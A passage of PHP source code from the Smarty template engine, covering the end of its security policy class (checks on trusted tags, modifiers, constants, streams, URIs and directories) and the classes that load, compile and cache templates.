            if (isset($allowed[ $class_name ])
                && (empty($allowed[ $class_name ]) || in_array($name, $allowed[ $class_name ]))
            ) {
                return true;
            }
        }
        $compiler->trigger_template_error("access to static class '{$class_name}' {$params[2]} '{$name}' not allowed by security setting");
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if PHP modifier is trusted.
     *
     * @param string $modifier_name
     * @param object $compiler compiler object
     * @deprecated
     * @return boolean                 true if modifier is trusted
     */
    public function isTrustedPhpModifier($modifier_name, $compiler)
    {
        if (isset($this->php_modifiers)
            && (empty($this->php_modifiers) || in_array($modifier_name, $this->php_modifiers))
        ) {
            return true;
        }
        $compiler->trigger_template_error("modifier '{$modifier_name}' not allowed by security setting");
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if tag is trusted.
     *
     * @param string $tag_name
     * @param object $compiler compiler object
     *
     * @return boolean                 true if tag is trusted
     */
    public function isTrustedTag($tag_name, $compiler)
    {
        // check for internal always required tags
        if (in_array(
            $tag_name,
            array(
                'assign', 'call', 'private_filter', 'private_block_plugin', 'private_function_plugin',
                'private_object_block_function', 'private_object_function', 'private_registered_function',
                'private_registered_block', 'private_special_variable', 'private_print_expression',
                'private_modifier'
            )
        )
        ) {
            return true;
        }
        // check security settings
        if (empty($this->allowed_tags)) {
            if (empty($this->disabled_tags) || !in_array($tag_name, $this->disabled_tags)) {
                return true;
            } else {
                $compiler->trigger_template_error("tag '{$tag_name}' disabled by security setting", null, true);
            }
        } elseif (in_array($tag_name, $this->allowed_tags) && !in_array($tag_name, $this->disabled_tags)) {
            return true;
        } else {
            $compiler->trigger_template_error("tag '{$tag_name}' not allowed by security setting", null, true);
        }
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if special $smarty variable is trusted.
     *
     * @param string $var_name
     * @param object $compiler compiler object
     *
     * @return boolean                 true if tag is trusted
     */
    public function isTrustedSpecialSmartyVar($var_name, $compiler)
    {
        if (!in_array($var_name, $this->disabled_special_smarty_vars)) {
            return true;
        } else {
            $compiler->trigger_template_error(
                "special variable '\$smarty.{$var_name}' not allowed by security setting",
                null,
                true
            );
        }
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if modifier plugin is trusted.
     *
     * @param string $modifier_name
     * @param object $compiler compiler object
     *
     * @return boolean                 true if tag is trusted
     */
    public function isTrustedModifier($modifier_name, $compiler)
    {
        // check for internal always allowed modifier
        if (in_array($modifier_name, array('default'))) {
            return true;
        }
        // check security settings
        if (empty($this->allowed_modifiers)) {
            if (empty($this->disabled_modifiers) || !in_array($modifier_name, $this->disabled_modifiers)) {
                return true;
            } else {
                $compiler->trigger_template_error(
                    "modifier '{$modifier_name}' disabled by security setting",
                    null,
                    true
                );
            }
        } elseif (in_array($modifier_name, $this->allowed_modifiers)
                  && !in_array($modifier_name, $this->disabled_modifiers)
        ) {
            return true;
        } else {
            $compiler->trigger_template_error(
                "modifier '{$modifier_name}' not allowed by security setting",
                null,
                true
            );
        }
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if constants are enabled or trusted
     *
     * @param string $const    constant name
     * @param object $compiler compiler object
     *
     * @return bool
     */
    public function isTrustedConstant($const, $compiler)
    {
        if (in_array($const, array('true', 'false', 'null'))) {
            return true;
        }
        if (!empty($this->trusted_constants)) {
            if (!in_array(strtolower($const), $this->trusted_constants)) {
                $compiler->trigger_template_error("Security: access to constant '{$const}' not permitted");
                return false;
            }
            return true;
        }
        if ($this->allow_constants) {
            return true;
        }
        $compiler->trigger_template_error("Security: access to constants not permitted");
        return false;
    }

    /**
     * Check if stream is trusted.
     *
     * @param string $stream_name
     *
     * @return boolean         true if stream is trusted
     * @throws SmartyException if stream is not trusted
     */
    public function isTrustedStream($stream_name)
    {
        if (isset($this->streams) && (empty($this->streams) || in_array($stream_name, $this->streams))) {
            return true;
        }
        throw new SmartyException("stream '{$stream_name}' not allowed by security setting");
    }

    /**
     * Check if directory of file resource is trusted.
     *
     * @param string    $filepath
     * @param null|bool $isConfig
     *
     * @return bool true if directory is trusted
     * @throws \SmartyException if directory is not trusted
     */
    public function isTrustedResourceDir($filepath, $isConfig = null)
    {
        if ($this->_include_path_status !== $this->smarty->use_include_path) {
            $_dir =
                $this->smarty->use_include_path ? $this->smarty->ext->_getIncludePath->getIncludePathDirs($this->smarty) : array();
            if ($this->_include_dir !== $_dir) {
                $this->_updateResourceDir($this->_include_dir, $_dir);
                $this->_include_dir = $_dir;
            }
            $this->_include_path_status = $this->smarty->use_include_path;
        }
        $_dir = $this->smarty->getTemplateDir();
        if ($this->_template_dir !== $_dir) {
            $this->_updateResourceDir($this->_template_dir, $_dir);
            $this->_template_dir = $_dir;
        }
        $_dir = $this->smarty->getConfigDir();
        if ($this->_config_dir !== $_dir) {
            $this->_updateResourceDir($this->_config_dir, $_dir);
            $this->_config_dir = $_dir;
        }
        if ($this->_secure_dir !== $this->secure_dir) {
            $this->secure_dir = (array)$this->secure_dir;
            foreach ($this->secure_dir as $k => $d) {
                $this->secure_dir[ $k ] = $this->smarty->_realpath($d . DIRECTORY_SEPARATOR, true);
            }
            $this->_updateResourceDir($this->_secure_dir, $this->secure_dir);
            $this->_secure_dir = $this->secure_dir;
        }
        $addPath = $this->_checkDir($filepath, $this->_resource_dir);
        if ($addPath !== false) {
            $this->_resource_dir = array_merge($this->_resource_dir, $addPath);
        }
        return true;
    }

    /**
     * Check if URI (e.g. {fetch} or {html_image}) is trusted
     * To simplify things, isTrustedUri() resolves all input to "{$PROTOCOL}://{$HOSTNAME}".
     * So "http://username:password@hello.world.example.org:8080/some-path?some=query-string"
     * is reduced to "http://hello.world.example.org" prior to applying the patters from {@link $trusted_uri}.
     *
     * @param string $uri
     *
     * @return boolean         true if URI is trusted
     * @throws SmartyException if URI is not trusted
     * @uses   $trusted_uri for list of patterns to match against $uri
     */
    public function isTrustedUri($uri)
    {
        $_uri = parse_url($uri);
        if (!empty($_uri[ 'scheme' ]) && !empty($_uri[ 'host' ])) {
            $_uri = $_uri[ 'scheme' ] . '://' . $_uri[ 'host' ];
            foreach ($this->trusted_uri as $pattern) {
                if (preg_match($pattern, $_uri)) {
                    return true;
                }
            }
        }
        throw new SmartyException("URI '{$uri}' not allowed by security setting");
    }

    /**
     * Remove old directories and its sub folders, add new directories
     *
     * @param array $oldDir
     * @param array $newDir
     */
    private function _updateResourceDir($oldDir, $newDir)
    {
        foreach ($oldDir as $directory) {
            //           $directory = $this->smarty->_realpath($directory, true);
            $length = strlen($directory);
            foreach ($this->_resource_dir as $dir) {
                if (substr($dir, 0, $length) === $directory) {
                    unset($this->_resource_dir[ $dir ]);
                }
            }
        }
        foreach ($newDir as $directory) {
            //           $directory = $this->smarty->_realpath($directory, true);
            $this->_resource_dir[ $directory ] = true;
        }
    }

    /**
     * Check if file is inside a valid directory
     *
     * @param string $filepath
     * @param array  $dirs valid directories
     *
     * @return array|bool
     * @throws \SmartyException
     */
    private function _checkDir($filepath, $dirs)
    {
        $directory = dirname($this->smarty->_realpath($filepath, true)) . DIRECTORY_SEPARATOR;
        $_directory = array();
        if (!preg_match('#[\\\\/][.][.][\\\\/]#', $directory)) {
            while (true) {
                // test if the directory is trusted
                if (isset($dirs[ $directory ])) {
                    return $_directory;
                }
                // abort if we've reached root
                if (!preg_match('#[\\\\/][^\\\\/]+[\\\\/]$#', $directory)) {
                    // give up
                    break;
                }
                // remember the directory to add it to _resource_dir in case we're successful
                $_directory[ $directory ] = true;
                // bubble up one level
                $directory = preg_replace('#[\\\\/][^\\\\/]+[\\\\/]$#', DIRECTORY_SEPARATOR, $directory);
            }
        }
        // give up
        throw new SmartyException(sprintf('Smarty Security: not trusted file path \'%s\' ', $filepath));
    }

    /**
     * Loads security class and enables security
     *
     * @param \Smarty                $smarty
     * @param string|Smarty_Security $security_class if a string is used, it must be class-name
     *
     * @return \Smarty current Smarty instance for chaining
     * @throws \SmartyException when an invalid class name is provided
     */
    public static function enableSecurity(Smarty $smarty, $security_class)
    {
        if ($security_class instanceof Smarty_Security) {
            $smarty->security_policy = $security_class;
            return $smarty;
        } elseif (is_object($security_class)) {
            throw new SmartyException("Class '" . get_class($security_class) . "' must extend Smarty_Security.");
        }
        if ($security_class === null) {
            $security_class = $smarty->security_class;
        }
        if (!class_exists($security_class)) {
            throw new SmartyException("Security class '$security_class' is not defined");
        } elseif ($security_class !== 'Smarty_Security' && !is_subclass_of($security_class, 'Smarty_Security')) {
            throw new SmartyException("Class '$security_class' must extend Smarty_Security.");
        } else {
            $smarty->security_policy = new $security_class($smarty);
        }
        return $smarty;
    }

    /**
     * Start template processing
     *
     * @param $template
     *
     * @throws SmartyException
     */
    public function startTemplate($template)
    {
        if ($this->max_template_nesting > 0 && $this->_current_template_nesting++ >= $this->max_template_nesting) {
            throw new SmartyException("maximum template nesting level of '{$this->max_template_nesting}' exceeded when calling '{$template->template_resource}'");
        }
    }

    /**
     * Exit template processing
     */
    public function endTemplate()
    {
        if ($this->max_template_nesting > 0) {
            $this->_current_template_nesting--;
        }
    }

    /**
     * Register callback functions call at start/end of template rendering
     *
     * @param \Smarty_Internal_Template $template
     */
    public function registerCallBacks(Smarty_Internal_Template $template)
    {
        $template->startRenderCallbacks[] = array($this, 'startTemplate');
        $template->endRenderCallbacks[] = array($this, 'endTemplate');
    }
}
<?php
/**
 * Created by PhpStorm.
 * User: Uwe Tews
 * Date: 04.12.2014
 * Time: 06:08
 */

/**
 * Smarty Resource Data Object
 * Cache Data Container for Template Files
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */
class Smarty_Template_Cached extends Smarty_Template_Resource_Base
{
    /**
     * Cache Is Valid
     *
     * @var boolean
     */
    public $valid = null;

    /**
     * CacheResource Handler
     *
     * @var Smarty_CacheResource
     */
    public $handler = null;

    /**
     * Template Cache Id (Smarty_Internal_Template::$cache_id)
     *
     * @var string
     */
    public $cache_id = null;

    /**
     * saved cache lifetime in seconds
     *
     * @var integer
     */
    public $cache_lifetime = 0;

    /**
     * Id for cache locking
     *
     * @var string
     */
    public $lock_id = null;

    /**
     * flag that cache is locked by this instance
     *
     * @var bool
     */
    public $is_locked = false;

    /**
     * Source Object
     *
     * @var Smarty_Template_Source
     */
    public $source = null;

    /**
     * Nocache hash codes of processed compiled templates
     *
     * @var array
     */
    public $hashes = array();

    /**
     * Flag if this is a cache resource
     *
     * @var bool
     */
    public $isCache = true;

    /**
     * create Cached Object container
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @throws \SmartyException
     */
    public function __construct(Smarty_Internal_Template $_template)
    {
        $this->compile_id = $_template->compile_id;
        $this->cache_id = $_template->cache_id;
        $this->source = $_template->source;
        if (!class_exists('Smarty_CacheResource', false)) {
            include SMARTY_SYSPLUGINS_DIR . 'smarty_cacheresource.php';
        }
        $this->handler = Smarty_CacheResource::load($_template->smarty);
    }

    /**
     * @param Smarty_Internal_Template $_template
     *
     * @return Smarty_Template_Cached
     */
    public static function load(Smarty_Internal_Template $_template)
    {
        $_template->cached = new Smarty_Template_Cached($_template);
        $_template->cached->handler->populate($_template->cached, $_template);
        // caching enabled ?
        if (!$_template->caching || $_template->source->handler->recompiled
        ) {
            $_template->cached->valid = false;
        }
        return $_template->cached;
    }

    /**
     * Render cache template
     *
     * @param \Smarty_Internal_Template $_template
     * @param bool                      $no_output_filter
     *
     * @throws \Exception
     */
    public function render(Smarty_Internal_Template $_template, $no_output_filter = true)
    {
        if ($this->isCached($_template)) {
            if ($_template->smarty->debugging) {
                if (!isset($_template->smarty->_debug)) {
                    $_template->smarty->_debug = new Smarty_Internal_Debug();
                }
                $_template->smarty->_debug->start_cache($_template);
            }
            if (!$this->processed) {
                $this->process($_template);
            }
            $this->getRenderedTemplateCode($_template);
            if ($_template->smarty->debugging) {
                $_template->smarty->_debug->end_cache($_template);
            }
            return;
        } else {
            $_template->smarty->ext->_updateCache->updateCache($this, $_template, $no_output_filter);
        }
    }

    /**
     * Check if cache is valid, lock cache if required
     *
     * @param \Smarty_Internal_Template $_template
     *
     * @return bool flag true if cache is valid
     */
    public function isCached(Smarty_Internal_Template $_template)
    {
        if ($this->valid !== null) {
            return $this->valid;
        }
        while (true) {
            while (true) {
                if ($this->exists === false || $_template->smarty->force_compile || $_template->smarty->force_cache) {
                    $this->valid = false;
                } else {
                    $this->valid = true;
                }
                if ($this->valid && $_template->caching === Smarty::CACHING_LIFETIME_CURRENT
                    && $_template->cache_lifetime >= 0 && time() > ($this->timestamp + $_template->cache_lifetime)
                ) {
                    // lifetime expired
                    $this->valid = false;
                }
                if ($this->valid && $_template->compile_check === Smarty::COMPILECHECK_ON
                    && $_template->source->getTimeStamp() > $this->timestamp
                ) {
                    $this->valid = false;
                }
                if ($this->valid || !$_template->smarty->cache_locking) {
                    break;
                }
                if (!$this->handler->locked($_template->smarty, $this)) {
                    $this->handler->acquireLock($_template->smarty, $this);
                    break 2;
                }
                $this->handler->populate($this, $_template);
            }
            if ($this->valid) {
                if (!$_template->smarty->cache_locking || $this->handler->locked($_template->smarty, $this) === null) {
                    // load cache file for the following checks
                    if ($_template->smarty->debugging) {
                        $_template->smarty->_debug->start_cache($_template);
                    }
                    if ($this->handler->process($_template, $this) === false) {
                        $this->valid = false;
                    } else {
                        $this->processed = true;
                    }
                    if ($_template->smarty->debugging) {
                        $_template->smarty->_debug->end_cache($_template);
                    }
                } else {
                    $this->is_locked = true;
                    continue;
                }
            } else {
                return $this->valid;
            }
            if ($this->valid && $_template->caching === Smarty::CACHING_LIFETIME_SAVED
                && $_template->cached->cache_lifetime >= 0
                && (time() > ($_template->cached->timestamp + $_template->cached->cache_lifetime))
            ) {
                $this->valid = false;
            }
            if ($_template->smarty->cache_locking) {
                if (!$this->valid) {
                    $this->handler->acquireLock($_template->smarty, $this);
                } elseif ($this->is_locked) {
                    $this->handler->releaseLock($_template->smarty, $this);
                }
            }
            return $this->valid;
        }
        return $this->valid;
    }

    /**
     * Process cached template
     *
     * @param Smarty_Internal_Template $_template template object
     * @param bool                     $update    flag if called because cache update
     */
    public function process(Smarty_Internal_Template $_template, $update = false)
    {
        if ($this->handler->process($_template, $this, $update) === false) {
            $this->valid = false;
        }
        if ($this->valid) {
            $this->processed = true;
        } else {
            $this->processed = false;
        }
    }

    /**
     * Read cache content from handler
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string|false content
     */
    public function read(Smarty_Internal_Template $_template)
    {
        if (!$_template->source->handler->recompiled) {
            return $this->handler->readCachedContent($_template);
        }
        return false;
    }
}
<?php

/**
 * Smarty Resource Data Object
 * Meta Data Container for Template Files
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 * @property   string $content compiled content
 */
class Smarty_Template_Compiled extends Smarty_Template_Resource_Base
{
    /**
     * nocache hash
     *
     * @var string|null
     */
    public $nocache_hash = null;

    /**
     * get a Compiled Object of this source
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return Smarty_Template_Compiled compiled object
     */
    public static function load($_template)
    {
        $compiled = new Smarty_Template_Compiled();
        if ($_template->source->handler->hasCompiledHandler) {
            $_template->source->handler->populateCompiledFilepath($compiled, $_template);
        } else {
            $compiled->populateCompiledFilepath($_template);
        }
        return $compiled;
    }

    /**
     * populate Compiled Object with compiled filepath
     *
     * @param Smarty_Internal_Template $_template template object
     **/
    public function populateCompiledFilepath(Smarty_Internal_Template $_template)
    {
        $source = &$_template->source;
        $smarty = &$_template->smarty;
        $this->filepath = $smarty->getCompileDir();
        if (isset($_template->compile_id)) {
            $this->filepath .= preg_replace('![^\w]+!', '_', $_template->compile_id) .
                               ($smarty->use_sub_dirs ? DIRECTORY_SEPARATOR : '^');
        }
        // if use_sub_dirs, break file into directories
        if ($smarty->use_sub_dirs) {
            $this->filepath .= $source->uid[ 0 ] . $source->uid[ 1 ] . DIRECTORY_SEPARATOR . $source->uid[ 2 ] .
                               $source->uid[ 3 ] . DIRECTORY_SEPARATOR . $source->uid[ 4 ] . $source->uid[ 5 ] .
                               DIRECTORY_SEPARATOR;
        }
        $this->filepath .= $source->uid . '_';
        if ($source->isConfig) {
            $this->filepath .= (int)$smarty->config_read_hidden + (int)$smarty->config_booleanize * 2 +
                               (int)$smarty->config_overwrite * 4;
        } else {
            $this->filepath .= (int)$smarty->merge_compiled_includes + (int)$smarty->escape_html * 2 +
                               (($smarty->merge_compiled_includes && $source->type === 'extends') ?
                                   (int)$smarty->extends_recursion * 4 : 0);
        }
        $this->filepath .= '.' . $source->type;
        $basename = $source->handler->getBasename($source);
        if (!empty($basename)) {
            $this->filepath .= '.' . $basename;
        }
        if ($_template->caching) {
            $this->filepath .= '.cache';
        }
        $this->filepath .= '.php';
        $this->timestamp = $this->exists = is_file($this->filepath);
        if ($this->exists) {
            $this->timestamp = filemtime($this->filepath);
        }
    }

    /**
     * render compiled template code
     *
     * @param Smarty_Internal_Template $_template
     *
     * @return void
     * @throws Exception
     */
    public function render(Smarty_Internal_Template $_template)
    {
        // checks if template exists
        if (!$_template->source->exists) {
            $type = $_template->source->isConfig ? 'config' : 'template';
            throw new SmartyException("Unable to load {$type} '{$_template->source->type}:{$_template->source->name}'");
        }
        if ($_template->smarty->debugging) {
            if (!isset($_template->smarty->_debug)) {
                $_template->smarty->_debug = new Smarty_Internal_Debug();
            }
            $_template->smarty->_debug->start_render($_template);
        }
        if (!$this->processed) {
            $this->process($_template);
        }
        if (isset($_template->cached)) {
            $_template->cached->file_dependency =
                array_merge($_template->cached->file_dependency, $this->file_dependency);
        }
        if ($_template->source->handler->uncompiled) {
            $_template->source->handler->renderUncompiled($_template->source, $_template);
        } else {
            $this->getRenderedTemplateCode($_template);
        }
        if ($_template->caching && $this->has_nocache_code) {
            $_template->cached->hashes[ $this->nocache_hash ] = true;
        }
        if ($_template->smarty->debugging) {
            $_template->smarty->_debug->end_render($_template);
        }
    }

    /**
     * load compiled template or compile from source
     *
     * @param Smarty_Internal_Template $_smarty_tpl do not change variable name, is used by compiled template
     *
     * @throws Exception
     */
    public function process(Smarty_Internal_Template $_smarty_tpl)
    {
        $source = &$_smarty_tpl->source;
        $smarty = &$_smarty_tpl->smarty;
        if ($source->handler->recompiled) {
            $source->handler->process($_smarty_tpl);
        } elseif (!$source->handler->uncompiled) {
            if (!$this->exists || $smarty->force_compile
                || ($_smarty_tpl->compile_check && $source->getTimeStamp() > $this->getTimeStamp())
            ) {
                $this->compileTemplateSource($_smarty_tpl);
                $compileCheck = $_smarty_tpl->compile_check;
                $_smarty_tpl->compile_check = Smarty::COMPILECHECK_OFF;
                $this->loadCompiledTemplate($_smarty_tpl);
                $_smarty_tpl->compile_check = $compileCheck;
            } else {
                $_smarty_tpl->mustCompile = true;
                @include $this->filepath;
                if ($_smarty_tpl->mustCompile) {
                    $this->compileTemplateSource($_smarty_tpl);
                    $compileCheck = $_smarty_tpl->compile_check;
                    $_smarty_tpl->compile_check = Smarty::COMPILECHECK_OFF;
                    $this->loadCompiledTemplate($_smarty_tpl);
                    $_smarty_tpl->compile_check = $compileCheck;
                }
            }
            $_smarty_tpl->_subTemplateRegister();
            $this->processed = true;
        }
    }

    /**
     * compile template from source
     *
     * @param Smarty_Internal_Template $_template
     *
     * @throws Exception
     */
    public function compileTemplateSource(Smarty_Internal_Template $_template)
    {
        $this->file_dependency = array();
        $this->includes = array();
        $this->nocache_hash = null;
        $this->unifunc = null;
        // compile locking
        if ($saved_timestamp = (!$_template->source->handler->recompiled && is_file($this->filepath))) {
            $saved_timestamp = $this->getTimeStamp();
            touch($this->filepath);
        }
        // compile locking
        try {
            // call compiler
            $_template->loadCompiler();
            $this->write($_template, $_template->compiler->compileTemplate($_template));
        } catch (Exception $e) {
            // restore old timestamp in case of error
            if ($saved_timestamp && is_file($this->filepath)) {
                touch($this->filepath, $saved_timestamp);
            }
            unset($_template->compiler);
            throw $e;
        }
        // release compiler object to free memory
        unset($_template->compiler);
    }

    /**
     * Write compiled code by handler
     *
     * @param Smarty_Internal_Template $_template template object
     * @param string                   $code      compiled code
     *
     * @return bool success
     * @throws \SmartyException
     */
    public function write(Smarty_Internal_Template $_template, $code)
    {
        if (!$_template->source->handler->recompiled) {
            if ($_template->smarty->ext->_writeFile->writeFile($this->filepath, $code, $_template->smarty) === true) {
                $this->timestamp = $this->exists = is_file($this->filepath);
                if ($this->exists) {
                    $this->timestamp = filemtime($this->filepath);
                    return true;
                }
            }
            return false;
        }
        return true;
    }

    /**
     * Read compiled content from handler
     *
     * @param Smarty_Internal_Template $_template template object
     *
     * @return string content
     */
    public function read(Smarty_Internal_Template $_template)
    {
        if (!$_template->source->handler->recompiled) {
            return file_get_contents($this->filepath);
        }
        return isset($this->content) ? $this->content : false;
    }

    /**
     * Load fresh compiled template by including the PHP file
     * HHVM requires a work around because of a PHP incompatibility
     *
     * @param \Smarty_Internal_Template $_smarty_tpl do not change variable name, is used by compiled template
     */
    private function loadCompiledTemplate(Smarty_Internal_Template $_smarty_tpl)
    {
        if (function_exists('opcache_invalidate')
            && (!function_exists('ini_get') || strlen(ini_get("opcache.restrict_api")) < 1)
        ) {
            opcache_invalidate($this->filepath, true);
        } elseif (function_exists('apc_compile_file')) {
            apc_compile_file($this->filepath);
        }
        if (defined('HHVM_VERSION')) {
            eval('?>' . file_get_contents($this->filepath));
        } else {
            include $this->filepath;
        }
    }
}
<?php
/**
 * Smarty Config Source Plugin
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 */

/**
 * Smarty Config Resource Data Object
 * Meta Data Container for Template Files
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Uwe Tews
 */
class Smarty_Template_Config extends Smarty_Template_Source
{
    /**
     * array of section names, single section or null
     *
     * @var null|string|array
     */
    public $config_sections = null;

    /**
     * scope into which the config variables shall be loaded
     *
     * @var int
     */
    public $scope = 0;

    /**
     * Flag that source is a config file
     *
     * @var bool
     */
    public $isConfig = true;

    /**
     * Name of the Class to compile this resource's contents with
     *
     * @var string
     */
    public $compiler_class = 'Smarty_Internal_Config_File_Compiler';

    /**
     * Name of the Class to tokenize this resource's contents with
     *
     * @var string
     */
    public $template_lexer_class = 'Smarty_Internal_Configfilelexer';

    /**
     * Name of the Class to parse this resource's contents with
     *
     * @var string
     */
    public $template_parser_class = 'Smarty_Internal_Configfileparser';

    /**
     * initialize Source Object for given resource
     * Either [$_template] or [$smarty, $template_resource] must be specified
     *
     * @param Smarty_Internal_Template|null $_template         template object
     * @param Smarty|null                   $smarty            smarty object
     * @param string                        $template_resource resource identifier
     *
     * @return Smarty_Template_Config Source Object
     * @throws SmartyException
     */
    public static function load(
        ?Smarty_Internal_Template $_template = null,
        ?Smarty $smarty = null,
        $template_resource = null
    ) {
        static $_incompatible_resources = array('extends' => true, 'php' => true);
        if ($_template) {
            $smarty = $_template->smarty;
            $template_resource = $_template->template_resource;
        }
        if (empty($template_resource)) {
            throw new SmartyException('Source: Missing  name');
        }
        // parse resource_name, load resource handler
        list($name, $type) = Smarty_Resource::parseResourceName($template_resource, $smarty->default_config_type);
        // make sure configs are not loaded via anything smarty can't handle
        if (isset($_incompatible_resources[ $type ])) {
            throw new SmartyException("Unable to use resource '{$type}' for config");
        }
        $source = new Smarty_Template_Config($smarty, $template_resource, $type, $name);
        $source->handler->populate($source, $_template);
        if (!$source->exists && isset($smarty->default_config_handler_func)) {
            Smarty_Internal_Method_RegisterDefaultTemplateHandler::_getDefaultTemplate($source);
            $source->handler->populate($source, $_template);
        }
        return $source;
    }
}
<?php

/**
 * Smarty Template Resource Base Object
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */
abstract class Smarty_Template_Resource_Base
{
    /**
     * Compiled Filepath
     *
     * @var string
     */
    public $filepath = null;

    /**
     * Compiled Timestamp
     *
     * @var integer|bool
     */
    public $timestamp = false;

    /**
     * Compiled Existence
     *
     * @var boolean
     */
    public $exists = false;

    /**
     * Template Compile Id (Smarty_Internal_Template::$compile_id)
     *
     * @var string
     */
    public $compile_id = null;

    /**
     * Compiled Content Loaded
     *
     * @var boolean
     */
    public $processed = false;

    /**
     * unique function name for compiled template code
     *
     * @var string
     */
    public $unifunc = '';

    /**
     * flag if template does contain nocache code sections
     *
     * @var bool
     */
    public $has_nocache_code = false;

    /**
     * resource file dependency
     *
     * @var array
     */
    public $file_dependency = array();

    /**
     * Content buffer
     *
     * @var string
     */
    public $content = null;

    /**
     * Included sub templates
     * - index name
     * - value use count
     *
     * @var int[]
     */
    public $includes = array();

    /**
     * Flag if this is a cache resource
     *
     * @var bool
     */
    public $isCache = false;

    /**
     * Process resource
     *
     * @param Smarty_Internal_Template $_template template object
     */
    abstract public function process(Smarty_Internal_Template $_template);

    /**
     * get rendered template content by calling compiled or cached template code
     *
     * @param \Smarty_Internal_Template $_template
     * @param string                    $unifunc function with template code
     *
     * @throws \Exception
     */
    public function getRenderedTemplateCode(Smarty_Internal_Template $_template, $unifunc = null)
    {
        $smarty = &$_template->smarty;
        $_template->isRenderingCache = $this->isCache;
        $level = ob_get_level();
        try {
            if (!isset($unifunc)) {
                $unifunc = $this->unifunc;
            }
            if (empty($unifunc) || !function_exists($unifunc)) {
                throw new SmartyException("Invalid compiled template for '{$_template->template_resource}'");
            }
            if ($_template->startRenderCallbacks) {
                foreach ($_template->startRenderCallbacks as $callback) {
                    call_user_func($callback, $_template);
                }
            }
            $unifunc($_template);
            foreach ($_template->endRenderCallbacks as $callback) {
                call_user_func($callback, $_template);
            }
            $_template->isRenderingCache = false;
        } catch (Exception $e) {
            $_template->isRenderingCache = false;
            while (ob_get_level() > $level) {
                ob_end_clean();
            }
            if (isset($smarty->security_policy)) {
                $smarty->security_policy->endTemplate();
            }
            throw $e;
        }
    }

    /**
     * Get compiled time stamp
     *
     * @return int
     */
    public function getTimeStamp()
    {
        if ($this->exists && !$this->timestamp) {
            $this->timestamp = filemtime($this->filepath);
        }
        return $this->timestamp;
    }
}
<?php

/**
 * Smarty Resource Data Object
 * Meta Data Container for Template Files
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */
class Smarty_Template_Source
{
    /**
     * Unique Template ID
     *
     * @var string
     */
    public $uid = null;

    /**
     * Template Resource (Smarty_Internal_Template::$template_resource)
     *
     * @var string
     */
    public $resource = null;

    /**
     * Resource Type
     *
     * @var string
     */
    public $type = null;

    /**
     * Resource Name
     *
     * @var string
     */
    public $name = null;

    /**
     * Source Filepath
     *
     * @var string
     */
    public $filepath = null;

    /**
     * Source Timestamp
     *
     * @var integer
     */
    public $timestamp = null;

    /**
     * Source Existence
     *
     * @var boolean
     */
    public $exists = false;

    /**
     * Source File Base name
     *
     * @var string
     */
    public $basename = null;

    /**
     * The Components an extended template is made of
     *
     * @var \Smarty_Template_Source[]
     */
    public $components = null;

    /**
     * Resource Handler
     *
     * @var \Smarty_Resource
     */
    public $handler = null;

    /**
     * Smarty instance
     *
     * @var Smarty
     */
    public $smarty = null;

    /**
     * Resource is source
     *
     * @var bool
     */
    public $isConfig = false;

    /**
     * Template source content eventually set by default handler
     *
     * @var string
     */
    public $content = null;

    /**
     * Name of the Class to compile this resource's contents with
     *
     * @var string
     */
    public $compiler_class = 'Smarty_Internal_SmartyTemplateCompiler';

    /**
     * Name of the Class to tokenize this resource's contents with
     *
     * @var string
     */
    public $template_lexer_class = 'Smarty_Internal_Templatelexer';

    /**
     * Name of the Class to parse this resource's contents with
     *
     * @var string
     */
    public $template_parser_class = 'Smarty_Internal_Templateparser';

    /**
     * create Source Object container
     *
     * @param Smarty $smarty   Smarty instance this source object belongs to
     * @param string $resource full template_resource
     * @param string $type     type of resource
     * @param string $name     resource name
     *
     * @throws   \SmartyException
     * @internal param \Smarty_Resource $handler Resource Handler this source object communicates with
     */
    public function __construct(Smarty $smarty, $resource, $type, $name)
    {
        $this->handler =
            isset($smarty->_cache[ 'resource_handlers' ][ $type ]) ? $smarty->_cache[ 'resource_handlers' ][ $type ] :
                Smarty_Resource::load($smarty, $type);
        $this->smarty = $smarty;
        $this->resource = $resource;
        $this->type = $type;
        $this->name = $name;
    }

    /**
     * initialize Source Object for given resource
     * Either [$_template] or [$smarty, $template_resource] must be specified
     *
     * @param Smarty_Internal_Template|null $_template         template object
     * @param Smarty|null                   $smarty            smarty object
     * @param string                        $template_resource resource identifier
     *
     * @return Smarty_Template_Source Source Object
     * @throws SmartyException
     */
    public static function load(
        ?Smarty_Internal_Template $_template = null,
        ?Smarty $smarty = null,
        $template_resource = null
    ) {
        if ($_template) {
            $smarty = $_template->smarty;
            $template_resource = $_template->template_resource;
        }
        if (empty($template_resource)) {
            throw new SmartyException('Source: Missing  name');
        }
        // parse resource_name, load resource handler, identify unique resource name
        if (preg_match('/^([A-Za-z0-9_\-]{2,})[:]([\s\S]*)$/', $template_resource, $match)) {
            $type = $match[ 1 ];
            $name = $match[ 2 ];
        } else {
            // no resource given, use default
            // or single character before the colon is not a resource type, but part of the filepath
            $type = $smarty->default_resource_type;
            $name = $template_resource;
        }
        // create new source  object
        $source = new Smarty_Template_Source($smarty, $template_resource, $type, $name);
        $source->handler->populate($source, $_template);
        if (!$source->exists && isset($_template->smarty->default_template_handler_func)) {
            Smarty_Internal_Method_RegisterDefaultTemplateHandler::_getDefaultTemplate($source);
            $source->handler->populate($source, $_template);
        }
        return $source;
    }

    /**
     * Get source time stamp
     *
     * @return int
     */
    public function getTimeStamp()
    {
        if (!isset($this->timestamp)) {
            $this->handler->populateTimestamp($this);
        }
        return $this->timestamp;
    }

    /**
     * Get source content
     *
     * @return string
     * @throws \SmartyException
     */
    public function getContent()
    {
        return isset($this->content) ? $this->content : $this->handler->getContent($this);
    }
}
<?php

/**
